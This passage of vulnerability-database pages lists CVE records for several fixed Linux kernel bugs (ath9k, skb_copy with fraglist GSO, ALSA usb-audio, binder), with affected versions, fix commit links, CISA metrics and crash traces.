tasklet_action_common
__do_softirq
irq_exit_rxu
sysvec_apic_timer_interrupt
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 27876a29de221186c9d5883e5fe5f6da18ef9a45 Version: 27876a29de221186c9d5883e5fe5f6da18ef9a45 Version: 27876a29de221186c9d5883e5fe5f6da18ef9a45 Version: 27876a29de221186c9d5883e5fe5f6da18ef9a45 Version: 27876a29de221186c9d5883e5fe5f6da18ef9a45 Version: 27876a29de221186c9d5883e5fe5f6da18ef9a45 Version: 27876a29de221186c9d5883e5fe5f6da18ef9a45 Version: 27876a29de221186c9d5883e5fe5f6da18ef9a45 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.128Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f44f073c78112ff921a220d01b86d09f2ace59bc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f11f0fd1ad6c11ae7856d4325fe9d05059767225"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/84770a996ad8d7f121ff2fb5a8d149aad52d64c1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9003fa9a0198ce004b30738766c67eb7373479c9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/25c6f49ef59b7a9b80a3f7ab9e95268a1b01a234"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e4f4bac7d3b64eb75f70cd3345712de6f68a215d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/be609c7002dd4504b15b069cb7582f4c778548d1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2adc886244dff60f948497b59affb6c6ebb3c348"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52594",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:55:54.886327Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:30.660Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/ath/ath9k/htc_drv_txrx.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f44f073c78112ff921a220d01b86d09f2ace59bc",
"status": "affected",
"version": "27876a29de221186c9d5883e5fe5f6da18ef9a45",
"versionType": "git"
},
{
"lessThan": "f11f0fd1ad6c11ae7856d4325fe9d05059767225",
"status": "affected",
"version": "27876a29de221186c9d5883e5fe5f6da18ef9a45",
"versionType": "git"
},
{
"lessThan": "84770a996ad8d7f121ff2fb5a8d149aad52d64c1",
"status": "affected",
"version": "27876a29de221186c9d5883e5fe5f6da18ef9a45",
"versionType": "git"
},
{
"lessThan": "9003fa9a0198ce004b30738766c67eb7373479c9",
"status": "affected",
"version": "27876a29de221186c9d5883e5fe5f6da18ef9a45",
"versionType": "git"
},
{
"lessThan": "25c6f49ef59b7a9b80a3f7ab9e95268a1b01a234",
"status": "affected",
"version": "27876a29de221186c9d5883e5fe5f6da18ef9a45",
"versionType": "git"
},
{
"lessThan": "e4f4bac7d3b64eb75f70cd3345712de6f68a215d",
"status": "affected",
"version": "27876a29de221186c9d5883e5fe5f6da18ef9a45",
"versionType": "git"
},
{
"lessThan": "be609c7002dd4504b15b069cb7582f4c778548d1",
"status": "affected",
"version": "27876a29de221186c9d5883e5fe5f6da18ef9a45",
"versionType": "git"
},
{
"lessThan": "2adc886244dff60f948497b59affb6c6ebb3c348",
"status": "affected",
"version": "27876a29de221186c9d5883e5fe5f6da18ef9a45",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/ath/ath9k/htc_drv_txrx.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.0"
},
{
"lessThan": "3.0",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.77",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.16",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"versionStartIncluding": "3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.77",
"versionStartIncluding": "3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.16",
"versionStartIncluding": "3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.4",
"versionStartIncluding": "3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "3.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath9k: Fix potential array-index-out-of-bounds read in ath9k_htc_txstatus()\n\nFix an array-index-out-of-bounds read in ath9k_htc_txstatus(). The bug\noccurs when txs-\u003ecnt, data from a URB provided by a USB device, is\nbigger than the size of the array txs-\u003etxstatus, which is\nHTC_MAX_TX_STATUS. WARN_ON() already checks it, but there is no bug\nhandling code after the check. Make the function return if that is the\ncase.\n\nFound by a modified version of syzkaller.\n\nUBSAN: array-index-out-of-bounds in htc_drv_txrx.c\nindex 13 is out of range for type \u0027__wmi_event_txstatus [12]\u0027\nCall Trace:\n ath9k_htc_txstatus\n ath9k_wmi_event_tasklet\n tasklet_action_common\n __do_softirq\n irq_exit_rxu\n sysvec_apic_timer_interrupt"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-21T08:49:46.466Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f44f073c78112ff921a220d01b86d09f2ace59bc"
},
{
"url": "https://git.kernel.org/stable/c/f11f0fd1ad6c11ae7856d4325fe9d05059767225"
},
{
"url": "https://git.kernel.org/stable/c/84770a996ad8d7f121ff2fb5a8d149aad52d64c1"
},
{
"url": "https://git.kernel.org/stable/c/9003fa9a0198ce004b30738766c67eb7373479c9"
},
{
"url": "https://git.kernel.org/stable/c/25c6f49ef59b7a9b80a3f7ab9e95268a1b01a234"
},
{
"url": "https://git.kernel.org/stable/c/e4f4bac7d3b64eb75f70cd3345712de6f68a215d"
},
{
"url": "https://git.kernel.org/stable/c/be609c7002dd4504b15b069cb7582f4c778548d1"
},
{
"url": "https://git.kernel.org/stable/c/2adc886244dff60f948497b59affb6c6ebb3c348"
}
],
"title": "wifi: ath9k: Fix potential array-index-out-of-bounds read in ath9k_htc_txstatus()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52594",
"datePublished": "2024-03-06T06:45:25.071Z",
"dateReserved": "2024-03-02T21:55:42.571Z",
"dateUpdated": "2025-05-21T08:49:46.466Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36929 (GCVE-0-2024-36929)
Vulnerability from cvelistv5
Published
2024-05-30 15:29
Modified
2025-05-04 09:12
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: core: reject skb_copy(_expand) for fraglist GSO skbs
SKB_GSO_FRAGLIST skbs must not be linearized, otherwise they become
invalid. Return NULL if such an skb is passed to skb_copy or
skb_copy_expand, in order to prevent a crash on a potential later
call to skb_gso_segment.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 3a1296a38d0cf62bffb9a03c585cbd5dbf15d596 Version: 3a1296a38d0cf62bffb9a03c585cbd5dbf15d596 Version: 3a1296a38d0cf62bffb9a03c585cbd5dbf15d596 Version: 3a1296a38d0cf62bffb9a03c585cbd5dbf15d596 Version: 3a1296a38d0cf62bffb9a03c585cbd5dbf15d596 Version: 3a1296a38d0cf62bffb9a03c585cbd5dbf15d596 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36929",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-04T15:42:14.703241Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:47:55.373Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-09-05T08:03:34.841Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/faa83a7797f06cefed86731ba4baa3b4dfdc06c1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c7af99cc21923a9650533c9d77265c8dd683a533"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/989bf6fd1e1d058e73a364dce1a0c53d33373f62"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cfe34d86ef9765c388f145039006bb79b6c81ac6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/aea5e2669c2863fdd8679c40ee310b3bcaa85aec"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d091e579b864fa790dd6a0cd537a22c383126681"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240905-0010/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/core/skbuff.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "faa83a7797f06cefed86731ba4baa3b4dfdc06c1",
"status": "affected",
"version": "3a1296a38d0cf62bffb9a03c585cbd5dbf15d596",
"versionType": "git"
},
{
"lessThan": "c7af99cc21923a9650533c9d77265c8dd683a533",
"status": "affected",
"version": "3a1296a38d0cf62bffb9a03c585cbd5dbf15d596",
"versionType": "git"
},
{
"lessThan": "989bf6fd1e1d058e73a364dce1a0c53d33373f62",
"status": "affected",
"version": "3a1296a38d0cf62bffb9a03c585cbd5dbf15d596",
"versionType": "git"
},
{
"lessThan": "cfe34d86ef9765c388f145039006bb79b6c81ac6",
"status": "affected",
"version": "3a1296a38d0cf62bffb9a03c585cbd5dbf15d596",
"versionType": "git"
},
{
"lessThan": "aea5e2669c2863fdd8679c40ee310b3bcaa85aec",
"status": "affected",
"version": "3a1296a38d0cf62bffb9a03c585cbd5dbf15d596",
"versionType": "git"
},
{
"lessThan": "d091e579b864fa790dd6a0cd537a22c383126681",
"status": "affected",
"version": "3a1296a38d0cf62bffb9a03c585cbd5dbf15d596",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/core/skbuff.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.6"
},
{
"lessThan": "5.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.217",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.217",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: core: reject skb_copy(_expand) for fraglist GSO skbs\n\nSKB_GSO_FRAGLIST skbs must not be linearized, otherwise they become\ninvalid. Return NULL if such an skb is passed to skb_copy or\nskb_copy_expand, in order to prevent a crash on a potential later\ncall to skb_gso_segment."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:12:17.407Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/faa83a7797f06cefed86731ba4baa3b4dfdc06c1"
},
{
"url": "https://git.kernel.org/stable/c/c7af99cc21923a9650533c9d77265c8dd683a533"
},
{
"url": "https://git.kernel.org/stable/c/989bf6fd1e1d058e73a364dce1a0c53d33373f62"
},
{
"url": "https://git.kernel.org/stable/c/cfe34d86ef9765c388f145039006bb79b6c81ac6"
},
{
"url": "https://git.kernel.org/stable/c/aea5e2669c2863fdd8679c40ee310b3bcaa85aec"
},
{
"url": "https://git.kernel.org/stable/c/d091e579b864fa790dd6a0cd537a22c383126681"
}
],
"title": "net: core: reject skb_copy(_expand) for fraglist GSO skbs",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36929",
"datePublished": "2024-05-30T15:29:21.430Z",
"dateReserved": "2024-05-30T15:25:07.069Z",
"dateUpdated": "2025-05-04T09:12:17.407Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27436 (GCVE-0-2024-27436)
Vulnerability from cvelistv5
Published
2024-05-17 12:12
Modified
2025-05-04 09:05
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ALSA: usb-audio: Stop parsing channels bits when all channels are found.
If a usb audio device sets more bits than the amount of channels
it could write outside of the map array.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 04324ccc75f96b3ed7aad1c866d1b7925e977bdf Version: 04324ccc75f96b3ed7aad1c866d1b7925e977bdf Version: 04324ccc75f96b3ed7aad1c866d1b7925e977bdf Version: 04324ccc75f96b3ed7aad1c866d1b7925e977bdf Version: 04324ccc75f96b3ed7aad1c866d1b7925e977bdf Version: 04324ccc75f96b3ed7aad1c866d1b7925e977bdf Version: 04324ccc75f96b3ed7aad1c866d1b7925e977bdf Version: 04324ccc75f96b3ed7aad1c866d1b7925e977bdf Version: 04324ccc75f96b3ed7aad1c866d1b7925e977bdf |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-27436",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-21T15:45:09.433584Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-787",
"description": "CWE-787 Out-of-bounds Write",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-07T20:20:17.657Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:34:52.266Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7e2c1b0f6dd9abde9e60f0f9730026714468770f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6d5dc96b154be371df0d62ecb07efe400701ed8a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5cd466673b34bac369334f66cbe14bb77b7d7827"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9af1658ba293458ca6a13f70637b9654fa4be064"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/629af0d5fe94a35f498ba2c3f19bd78bfa591be6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/22cad1b841a63635a38273b799b4791f202ade72"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c8a24fd281dcdf3c926413dafbafcf35cde517a9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6d88b289fb0a8d055cb79d1c46a56aba7809d96d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a39d51ff1f52cd0b6fe7d379ac93bd8b4237d1b7"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"sound/usb/stream.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "7e2c1b0f6dd9abde9e60f0f9730026714468770f",
"status": "affected",
"version": "04324ccc75f96b3ed7aad1c866d1b7925e977bdf",
"versionType": "git"
},
{
"lessThan": "6d5dc96b154be371df0d62ecb07efe400701ed8a",
"status": "affected",
"version": "04324ccc75f96b3ed7aad1c866d1b7925e977bdf",
"versionType": "git"
},
{
"lessThan": "5cd466673b34bac369334f66cbe14bb77b7d7827",
"status": "affected",
"version": "04324ccc75f96b3ed7aad1c866d1b7925e977bdf",
"versionType": "git"
},
{
"lessThan": "9af1658ba293458ca6a13f70637b9654fa4be064",
"status": "affected",
"version": "04324ccc75f96b3ed7aad1c866d1b7925e977bdf",
"versionType": "git"
},
{
"lessThan": "629af0d5fe94a35f498ba2c3f19bd78bfa591be6",
"status": "affected",
"version": "04324ccc75f96b3ed7aad1c866d1b7925e977bdf",
"versionType": "git"
},
{
"lessThan": "22cad1b841a63635a38273b799b4791f202ade72",
"status": "affected",
"version": "04324ccc75f96b3ed7aad1c866d1b7925e977bdf",
"versionType": "git"
},
{
"lessThan": "c8a24fd281dcdf3c926413dafbafcf35cde517a9",
"status": "affected",
"version": "04324ccc75f96b3ed7aad1c866d1b7925e977bdf",
"versionType": "git"
},
{
"lessThan": "6d88b289fb0a8d055cb79d1c46a56aba7809d96d",
"status": "affected",
"version": "04324ccc75f96b3ed7aad1c866d1b7925e977bdf",
"versionType": "git"
},
{
"lessThan": "a39d51ff1f52cd0b6fe7d379ac93bd8b4237d1b7",
"status": "affected",
"version": "04324ccc75f96b3ed7aad1c866d1b7925e977bdf",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"sound/usb/stream.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.8"
},
{
"lessThan": "3.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.311",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.311",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: usb-audio: Stop parsing channels bits when all channels are found.\n\nIf a usb audio device sets more bits than the amount of channels\nit could write outside of the map array."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:05:04.457Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/7e2c1b0f6dd9abde9e60f0f9730026714468770f"
},
{
"url": "https://git.kernel.org/stable/c/6d5dc96b154be371df0d62ecb07efe400701ed8a"
},
{
"url": "https://git.kernel.org/stable/c/5cd466673b34bac369334f66cbe14bb77b7d7827"
},
{
"url": "https://git.kernel.org/stable/c/9af1658ba293458ca6a13f70637b9654fa4be064"
},
{
"url": "https://git.kernel.org/stable/c/629af0d5fe94a35f498ba2c3f19bd78bfa591be6"
},
{
"url": "https://git.kernel.org/stable/c/22cad1b841a63635a38273b799b4791f202ade72"
},
{
"url": "https://git.kernel.org/stable/c/c8a24fd281dcdf3c926413dafbafcf35cde517a9"
},
{
"url": "https://git.kernel.org/stable/c/6d88b289fb0a8d055cb79d1c46a56aba7809d96d"
},
{
"url": "https://git.kernel.org/stable/c/a39d51ff1f52cd0b6fe7d379ac93bd8b4237d1b7"
}
],
"title": "ALSA: usb-audio: Stop parsing channels bits when all channels are found.",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27436",
"datePublished": "2024-05-17T12:12:40.017Z",
"dateReserved": "2024-02-25T13:47:42.687Z",
"dateUpdated": "2025-05-04T09:05:04.457Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52438 (GCVE-0-2023-52438)
Vulnerability from cvelistv5
Published
2024-02-20 18:34
Modified
2025-05-04 07:36
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
binder: fix use-after-free in shinker's callback
The mmap read lock is used during the shrinker's callback, which means
that using alloc->vma pointer isn't safe as it can race with munmap().
As of commit dd2283f2605e ("mm: mmap: zap pages with read mmap_sem in
munmap") the mmap lock is downgraded after the vma has been isolated.
I was able to reproduce this issue by manually adding some delays and
triggering page reclaiming through the shrinker's debug sysfs. The
following KASAN report confirms the UAF:
==================================================================
BUG: KASAN: slab-use-after-free in zap_page_range_single+0x470/0x4b8
Read of size 8 at addr ffff356ed50e50f0 by task bash/478
CPU: 1 PID: 478 Comm: bash Not tainted 6.6.0-rc5-00055-g1c8b86a3799f-dirty #70
Hardware name: linux,dummy-virt (DT)
Call trace:
zap_page_range_single+0x470/0x4b8
binder_alloc_free_page+0x608/0xadc
__list_lru_walk_one+0x130/0x3b0
list_lru_walk_node+0xc4/0x22c
binder_shrink_scan+0x108/0x1dc
shrinker_debugfs_scan_write+0x2b4/0x500
